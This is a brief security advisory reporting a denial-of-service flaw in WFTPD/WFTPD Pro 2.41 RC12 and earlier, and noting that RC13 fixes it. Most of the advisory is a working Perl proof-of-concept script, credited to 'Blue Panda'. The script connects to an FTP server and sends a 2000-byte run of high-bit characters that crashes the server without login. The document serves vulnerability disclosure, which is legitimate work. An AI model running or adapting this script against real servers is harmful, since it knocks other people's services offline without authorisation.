COMMAND

    WFTPD

SYSTEMS AFFECTED

    WFTPD/WFTPD Pro 2.41 RC12 and prior

PROBLEM

    Michael  (Blue  Panda)  found  following.   WFTPD  will crash if a
    large  string  consisting  of  characters  128-255 is received.  A
    valid user/pass combination is  not required to take  advantage of
    this flaw.

    Proof of concept:

    #!/usr/bin/perl
    #
    # WFTPD/WFTPD Pro 2.41 RC12 denial-of-service
    # Blue Panda - bluepanda@dwarf.box.sk
    # http://bluepanda.box.sk/
    #
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    #
    # Sends WFTPD string consisting of characters > 127, causing it to crash.
    #
    
    use IO::Socket;
    
    $host = "ftp.host.com" ;
    $port = "21";
    $sleepfor = 4;
    
    print "Connecting to $host:$port...";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
    print "done.\n";
    
    $buffer = "\x80" x 2000;
    
    print $socket "$buffer\n";
    $counter = 0;
    print "Sleeping for $sleepfor seconds.";
    while($counter < $sleepfor) {
            sleep(1);
            print ".";
            $counter += 1;
    }
    print "\n";
    
    close($socket);

SOLUTION

    A fix has been released.  WFTPD/WFTPD Pro 2.41 RC13 is OK.